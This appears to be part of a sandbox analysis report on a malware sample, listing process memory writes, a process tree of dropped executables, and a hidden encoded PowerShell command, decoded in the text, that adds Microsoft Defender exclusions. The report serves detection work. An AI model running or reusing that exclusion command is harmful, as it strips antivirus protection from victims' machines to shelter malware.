PID 2336 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe (3 identical rows)
PID 2336 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe (3 identical rows)
PID 2336 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe (3 identical rows)
PID 2336 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 2336 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\BBLb.exe C:\Users\Admin\AppData\Local\Temp\BBLb.exe
PID 3784 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 3784 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 3784 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe
PID 2888 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe

"C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe"

C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe

"C:\Users\Admin\AppData\Local\Temp\96af9bc7db122e2486c0c1f1b90faacc.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

"C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Users\Admin\AppData\Local\Temp\Dropakxa.exe

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3204 -ip 3204

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 448

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3204 -ip 3204

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 444

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA
(The -enc argument is UTF-16LE base64 and decodes to: Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; Add-MpPreference -ExclusionProcess AttributeString.exe; that is, it adds Microsoft Defender exclusions for the drop directory and for the dropped AttributeString.exe, which is a useful detection point.)

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

"C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe" 0

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe

C:\Windows\SysWOW64\dialer.exe

"C:\Windows\system32\dialer.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3808 -ip 3808

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 448

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3808 -ip 3808

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 444

C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe

C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA
(Same encoded Add-MpPreference command as the earlier powershell.exe process: it adds Defender exclusions for C:\Users\Admin\AppData\Local and AttributeString.exe.)

Network


Files
